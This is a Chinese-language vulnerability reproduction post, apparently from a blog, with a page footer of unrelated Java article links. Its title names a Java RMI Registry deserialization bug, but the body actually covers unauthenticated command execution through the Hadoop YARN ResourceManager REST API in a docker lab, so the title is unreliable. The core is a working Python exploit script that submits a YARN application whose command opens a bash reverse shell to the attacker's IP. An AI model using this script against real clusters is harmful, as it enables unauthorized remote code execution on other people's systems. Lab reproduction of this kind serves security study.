新后端漏洞(上)- Java RMI Registry反序列化漏洞

漏洞介绍:

参考 http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf
漏洞环境:

docker 环境

docker-compose up -d

环境启动后,访问http://127.0.0.1:8088即可看到Hadoop YARN ResourceManager WebUI页面。

1、漏洞复现:

通过任务执行,利用过程如下:

1、在本地监听等待反弹 shell 连接

2、调用 New Application API 创建 Application

3、调用 Submit Application API 提交

python 复制代码
#!/usr/bin/env python

import requests

target = 'http://127.0.0.1:8088/'
lhost = '192.168.108.131' # put your local host ip here, and listen at port 9999

url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {
    'application-id': app_id,
    'application-name': 'get-shell',
    'am-container-spec': {
        'commands': {
            'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
        },
    },
    'application-type': 'YARN',
}
requests.post(url, json=data)

成功获取shell

相关推荐
yuzhiboyouye11 小时前
为什么sping-boot+ mabatis。写接口时要建好几个VO。各自用途时
java
SamDeepThinking11 小时前
第2篇:应付百万并发商品系统之需求文档
java·后端·架构
heimeiyingwang11 小时前
【架构实战】领域事件与业务编排架构
java·微服务·架构
月落归舟11 小时前
带你了解Collections和Collection!!!
java·collections·collection
直奔標竿11 小时前
Java开发者AI转型第二十课!Spring AI MCP 双向实战:客户端与服务端手把手落地
java·开发语言·人工智能·spring boot·后端·spring
天码-行空11 小时前
深入拆解 Tomcat 架构:高层组件与启动流程设计
java·架构·tomcat
天码-行空11 小时前
深入拆解 Tomcat 架构:一键启停与生命周期设计
java·架构·tomcat
c++之路11 小时前
C++ 高频易错点
java·jvm·c++
java1234_小锋11 小时前
Spring AI 2.0 开发Java Agent智能体 - 新建 HelloWorld 项目
java·人工智能·spring·spring ai